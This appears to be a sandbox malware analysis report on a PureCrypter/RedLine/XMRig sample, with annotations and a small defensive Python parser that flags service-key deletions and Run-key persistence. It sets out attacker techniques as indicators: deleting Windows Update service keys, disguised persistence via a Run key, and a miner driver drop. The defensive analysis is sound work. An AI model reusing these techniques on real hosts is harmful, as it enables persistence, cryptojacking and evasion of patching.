Malware Analysis Report

2025-05-28 17:26

Sample ID 230112-lxy3psbe2t
Target 76bdef9de3117ff2a00febc3b411bd576365644fb339e9af93766e11feaa535d
SHA256 76bdef9de3117ff2a00febc3b411bd576365644fb339e9af93766e11feaa535d
Tags
purecrypter redline xmrig 5633308507 evasion infostealer loader miner persistence spyware trojan upx
score
10/10

Table of Contents

Analysis Overview

MITRE ATT&CK

Enterprise Matrix V6

Analysis: static1

Detonation Overview

Signatures

Analysis: behavioral1

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis Overview

score
10/10

SHA256

76bdef9de3117ff2a00febc3b411bd576365644fb339e9af93766e11feaa535d

Threat Level: Known bad

The file 76bdef9de3117ff2a00febc3b411bd576365644fb339e9af93766e11feaa535d was found to be: Known bad.

Malicious Activity Summary

Modifies security service

xmrig

RedLine

PureCrypter

Detect PureCrypter loader

Suspicious use of NtCreateUserProcessOtherParentProcess

XMRig Miner payload

Stops running service(s)

UPX packed file

Executes dropped EXE

Accesses cryptocurrency files/wallets, possible credential harvesting

Adds Run key to start application

Suspicious use of NtSetInformationThreadHideFromDebugger

Drops file in System32 directory

Suspicious use of SetThreadContext

Launches sc.exe

Drops file in Program Files directory

Enumerates physical storage devices

Suspicious use of WriteProcessMemory

Suspicious use of AdjustPrivilegeToken

Suspicious behavior: LoadsDriver

Modifies data under HKEY_USERS

Suspicious behavior: EnumeratesProcesses

Gathers network information

MITRE ATT&CK

Analysis: static1

Detonation Overview

Reported

2023-01-12 09:55

Signatures

N/A

Analysis: behavioral1

Detonation Overview

Submitted

2023-01-12 09:55

Reported

2023-01-12 09:57

Platform

win10-20220812-en

Max time kernel

150s

Max time network

131s

Command Line

C:\Windows\Explorer.EXE

Signatures

Detect PureCrypter loader

loader
Description Indicator Process Target
N/A N/A N/A N/A

Modifies security service

evasion
Description Indicator Process Target
Key deleted \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\wuauserv\Parameters C:\Windows\System32\reg.exe N/A
Key deleted \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\wuauserv\Security C:\Windows\System32\reg.exe N/A
Key deleted \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\wuauserv\TriggerInfo\0 C:\Windows\System32\reg.exe N/A
Key deleted \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\wuauserv\TriggerInfo\1 C:\Windows\System32\reg.exe N/A
Key deleted \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\wuauserv\TriggerInfo C:\Windows\System32\reg.exe N/A

wuauserv is the Windows Update service. Its Parameters key holds the ServiceDll that the hosting svchost.exe loads, Security holds the service's security descriptor and TriggerInfo holds its start triggers; with all three deleted the service can no longer be started, so the host stays unpatched while the miner runs. The five deletions correspond to the five reg.exe children of cmd.exe PID 2688 in the WriteProcessMemory table below.

PureCrypter

trojan loader purecrypter

RedLine

infostealer redline

xmrig

miner xmrig

XMRig Miner payload

miner
Description Indicator Process Target
N/A N/A N/A N/A
N/A N/A N/A N/A

Executes dropped EXE

Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\Local\Temp\Gpwangiscadatahub.exe N/A
N/A N/A C:\Program Files\Windows\WindowsHost N/A

Stops running service(s)

evasion

UPX packed file

upx
Description Indicator Process Target
N/A N/A N/A N/A
N/A N/A N/A N/A

Accesses cryptocurrency files/wallets, possible credential harvesting

spyware

Adds Run key to start application

persistence
Description Indicator Process Target
Set value (str) \REGISTRY\USER\S-1-5-21-2482096546-1136599444-1359412500-1000\Software\Microsoft\Windows\CurrentVersion\Run\WindowsHost = "\"C:\\Users\\Admin\\AppData\\Roaming\\Microsoft\\Windows\\Start Menu\\Programs\\GooglePrograms\\WindowsHost.exe\"" C:\Users\Admin\AppData\Local\Temp\76bdef9de3117ff2a00febc3b411bd576365644fb339e9af93766e11feaa535d.exe N/A
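
Added example, not part of the sandbox report: a small Python parser for registry rows as this report renders them, with two rules run over the five "Modifies security service" rows and the Run-key row above plus one constructed benign row copied from the HKEY_USERS table further down. The first rule flags key deletions under a Services\<name> path (what happened to wuauserv); the second pulls the executable out of the Run-key value, undoing the C-style escaping the report applies to REG_SZ data, and flags targets under C:\Users as user-level persistence. Column splitting assumes the report's single-space join and that a process path begins with a drive letter after whitespace (a path quoted inside a value is preceded by a quote, so it does not match); the rule names and the C:\Users heuristic are this example's own choices.

```python
import re
from collections import namedtuple
from typing import Dict, List, Optional, Tuple

# Constructed input: rows copied from the two tables above, plus one
# certificate-store row from the HKEY_USERS table that the rules must ignore.
# The sandbox prints "<operation> <indicator> <process> <target>" joined by spaces.
SAMPLE_ROWS = [
    r"Key deleted \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\wuauserv\Parameters C:\Windows\System32\reg.exe N/A",
    r"Key deleted \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\wuauserv\Security C:\Windows\System32\reg.exe N/A",
    r"Key deleted \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\wuauserv\TriggerInfo\0 C:\Windows\System32\reg.exe N/A",
    r"Key deleted \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\wuauserv\TriggerInfo\1 C:\Windows\System32\reg.exe N/A",
    r"Key deleted \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\wuauserv\TriggerInfo C:\Windows\System32\reg.exe N/A",
    r'Set value (str) \REGISTRY\USER\S-1-5-21-2482096546-1136599444-1359412500-1000\Software\Microsoft\Windows\CurrentVersion\Run\WindowsHost = "\"C:\\Users\\Admin\\AppData\\Roaming\\Microsoft\\Windows\\Start Menu\\Programs\\GooglePrograms\\WindowsHost.exe\"" C:\Users\Admin\AppData\Local\Temp\76bdef9de3117ff2a00febc3b411bd576365644fb339e9af93766e11feaa535d.exe N/A',
    r"Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A",
]

OPERATION_RE = re.compile(
    r"^(?P<op>Key deleted|Key created|Set value \((?:str|int|data)\)|"
    r"File created|File opened for modification)\s+(?P<rest>.*)$")
# Drive-letter path following whitespace: the process column is the last one
# once the target column is removed. A path inside a REG_SZ value is preceded
# by a quote, not whitespace, so it is not mistaken for the process.
PATH_START_RE = re.compile(r"(?<=\s)[A-Za-z]:\\")
SERVICE_KEY_RE = re.compile(
    r"^\\REGISTRY\\MACHINE\\SYSTEM\\(?:ControlSet\d{3}|CurrentControlSet)"
    r"\\Services\\(?P<service>[^\\]+)", re.IGNORECASE)
RUN_KEY_RE = re.compile(
    r"\\Software\\Microsoft\\Windows\\CurrentVersion\\Run(?:Once)?\\"
    r"(?P<name>[^\\ ]+) = (?P<value>.*)$", re.IGNORECASE)

Row = namedtuple("Row", "operation indicator process target")


def parse_row(line: str) -> Row:
    """Split one report row into its four columns."""
    m = OPERATION_RE.match(line.strip())
    if not m:
        raise ValueError(f"unrecognised row: {line!r}")
    rest, target = m.group("rest"), None
    if rest.endswith(" N/A"):
        rest = rest[: -len(" N/A")]
    else:  # a real target is itself a path: peel it off from the right
        last = list(PATH_START_RE.finditer(rest))[-1].start()
        rest, target = rest[:last].rstrip(), rest[last:]
    starts = list(PATH_START_RE.finditer(rest))
    if not starts:
        raise ValueError(f"no process column in: {line!r}")
    cut = starts[-1].start()
    return Row(m.group("op"), rest[:cut].rstrip(), rest[cut:], target)


def unescape_value(value: str) -> str:
    """Undo the report's escaping of REG_SZ data (backslash-backslash and
    backslash-quote) and drop the quotes wrapping a command line."""
    value = value.strip()
    if len(value) >= 2 and value[0] == value[-1] == '"':
        value = value[1:-1]
    return re.sub(r"\\(.)", r"\1", value).strip().strip('"')


def tampered_services(rows: List[Row]) -> Dict[str, List[str]]:
    """Service name -> keys deleted under HKLM\\SYSTEM\\...\\Services\\<name>."""
    hits: Dict[str, List[str]] = {}
    for r in rows:
        if r.operation != "Key deleted":
            continue
        m = SERVICE_KEY_RE.match(r.indicator)
        if m:
            hits.setdefault(m.group("service").lower(), []).append(r.indicator)
    return hits


def run_key_entries(rows: List[Row]) -> List[Tuple[str, str, str]]:
    """(value name, executable path, writing process) for each Run-key write."""
    out = []
    for r in rows:
        if not r.operation.startswith("Set value"):
            continue
        m = RUN_KEY_RE.search(r.indicator)
        if m:
            out.append((m.group("name"), unescape_value(m.group("value")), r.process))
    return out


def user_profile_run_keys(rows: List[Row]) -> List[Tuple[str, str, str]]:
    """Run keys pointing under C:\\Users: persistence that needed no admin rights
    (heuristic chosen for this example; consistent with the HKU hive in the row)."""
    return [e for e in run_key_entries(rows) if e[1].lower().startswith("c:\\users\\")]


if __name__ == "__main__":
    parsed = [parse_row(line) for line in SAMPLE_ROWS]
    print(tampered_services(parsed))
    print(user_profile_run_keys(parsed))
```

Run as-is it reports wuauserv with five deleted keys and one user-profile Run key pointing at WindowsHost.exe under Start Menu\Programs\GooglePrograms; the PowerShell certificate-store row produces nothing.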

Drops file in System32 directory

Description Indicator Process Target
File created C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
File created C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\powershell.exe.log C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
File opened for modification C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A

Suspicious use of NtSetInformationThreadHideFromDebugger

Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\Local\Temp\Gpwangiscadatahub.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\Gpwangiscadatahub.exe N/A
N/A N/A C:\Program Files\Windows\WindowsHost N/A
N/A N/A C:\Program Files\Windows\WindowsHost N/A

Drops file in Program Files directory

Description Indicator Process Target
File created C:\Program Files\Google\Libs\WR64.sys C:\Program Files\Windows\WindowsHost N/A
File created C:\Program Files\Google\Libs\g.log C:\Windows\System32\cmd.exe N/A
File created C:\Program Files\Google\Libs\g.log C:\Windows\System32\cmd.exe N/A
File created C:\Program Files\Windows\WindowsHost C:\Users\Admin\AppData\Local\Temp\Gpwangiscadatahub.exe N/A

WR64.sys is written by WindowsHost, the dropped second-stage binary, next to a g.log that cmd.exe creates twice. Taken with the LoadsDriver signature and the SeLoadDriverPrivilege adjustments further down, this matches XMRig loading its bundled WinRing0 driver to program MSRs for a higher hash rate. The report does not itself identify the driver, so confirm it from the dropped file's hash and signature before treating the filename as more than circumstantial.

Enumerates physical storage devices

Gathers network information

Description Indicator Process Target
N/A N/A C:\Windows\SysWOW64\ipconfig.exe N/A
N/A N/A C:\Windows\SysWOW64\ipconfig.exe N/A

Modifies data under HKEY_USERS

Description Indicator Process Target
Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople\CTLs C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA\Certificates C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople\CRLs C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed\CTLs C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople\CRLs C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Set value (int) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\AutoDetect = "0" C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA\CRLs C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root\Certificates C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Set value (data) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1e\52C64B7E\LanguageList = 65006e002d0055005300000065006e0000000000 C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\ C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA\CTLs C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust\CTLs C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed\CTLs C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Set value (int) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\IntranetName = "1" C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Set value (int) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\AutoDetect = "0" C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust\Certificates C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed\Certificates C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed\CRLs C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root\CTLs C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot\CRLs C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople\CTLs C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust\CRLs C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot\Certificates C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA\CRLs C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed\Certificates C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot\Certificates C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA\CTLs C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed\CTLs C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust\Certificates C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA\Certificates C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed\Certificates C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople\Certificates C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust\CRLs C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA\Certificates C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot\CTLs C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Set value (int) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\ProxyBypass = "1" C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA\CTLs C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust\Certificates C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root\CRLs C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root\CTLs C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople\CTLs C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust\CTLs C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust\CTLs C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA\CRLs C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed\CRLs C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed\CRLs C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\WinTrust\Trust Providers\Software Publishing C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot\CRLs C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople\CRLs C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A

Suspicious behavior: EnumeratesProcesses

Description Indicator Process Target
N/A N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\Gpwangiscadatahub.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\Gpwangiscadatahub.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\Gpwangiscadatahub.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\Gpwangiscadatahub.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\Gpwangiscadatahub.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\Gpwangiscadatahub.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\Gpwangiscadatahub.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\Gpwangiscadatahub.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\Gpwangiscadatahub.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\Gpwangiscadatahub.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe N/A
N/A N/A C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\Gpwangiscadatahub.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\Gpwangiscadatahub.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\Gpwangiscadatahub.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\Gpwangiscadatahub.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Program Files\Windows\WindowsHost N/A
N/A N/A C:\Program Files\Windows\WindowsHost N/A
N/A N/A C:\Program Files\Windows\WindowsHost N/A
N/A N/A C:\Program Files\Windows\WindowsHost N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Program Files\Windows\WindowsHost N/A
N/A N/A C:\Program Files\Windows\WindowsHost N/A
N/A N/A C:\Program Files\Windows\WindowsHost N/A
N/A N/A C:\Program Files\Windows\WindowsHost N/A
N/A N/A C:\Program Files\Windows\WindowsHost N/A
N/A N/A C:\Program Files\Windows\WindowsHost N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Program Files\Windows\WindowsHost N/A
N/A N/A C:\Program Files\Windows\WindowsHost N/A
N/A N/A C:\Program Files\Windows\WindowsHost N/A
N/A N/A C:\Program Files\Windows\WindowsHost N/A
N/A N/A C:\Windows\System32\conhost.exe N/A
N/A N/A C:\Windows\System32\conhost.exe N/A
N/A N/A C:\Program Files\Windows\WindowsHost N/A
N/A N/A C:\Program Files\Windows\WindowsHost N/A
N/A N/A C:\Windows\System32\svchost.exe N/A
N/A N/A C:\Windows\System32\svchost.exe N/A
N/A N/A C:\Windows\System32\svchost.exe N/A
N/A N/A C:\Windows\System32\svchost.exe N/A
N/A N/A C:\Windows\System32\svchost.exe N/A
N/A N/A C:\Windows\System32\svchost.exe N/A
N/A N/A C:\Windows\System32\svchost.exe N/A
N/A N/A C:\Windows\System32\svchost.exe N/A
N/A N/A C:\Windows\System32\svchost.exe N/A
N/A N/A C:\Windows\System32\svchost.exe N/A
N/A N/A C:\Windows\System32\svchost.exe N/A
N/A N/A C:\Windows\System32\svchost.exe N/A

Suspicious behavior: LoadsDriver

Description Indicator Process Target
N/A N/A N/A N/A

Suspicious use of AdjustPrivilegeToken

Description Indicator Process Target
Token: SeDebugPrivilege N/A C:\Users\Admin\AppData\Local\Temp\76bdef9de3117ff2a00febc3b411bd576365644fb339e9af93766e11feaa535d.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeIncreaseQuotaPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeSecurityPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeTakeOwnershipPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeLoadDriverPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeSystemProfilePrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeSystemtimePrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeProfSingleProcessPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeIncBasePriorityPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeCreatePagefilePrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeBackupPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeRestorePrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeShutdownPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeSystemEnvironmentPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeRemoteShutdownPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeUndockPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeManageVolumePrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: 33 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: 34 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: 35 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: 36 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeShutdownPrivilege N/A C:\Windows\System32\powercfg.exe N/A
Token: SeCreatePagefilePrivilege N/A C:\Windows\System32\powercfg.exe N/A
Token: SeShutdownPrivilege N/A C:\Windows\System32\powercfg.exe N/A
Token: SeCreatePagefilePrivilege N/A C:\Windows\System32\powercfg.exe N/A
Token: SeShutdownPrivilege N/A C:\Windows\System32\powercfg.exe N/A
Token: SeCreatePagefilePrivilege N/A C:\Windows\System32\powercfg.exe N/A
Token: SeShutdownPrivilege N/A C:\Windows\System32\powercfg.exe N/A
Token: SeCreatePagefilePrivilege N/A C:\Windows\System32\powercfg.exe N/A
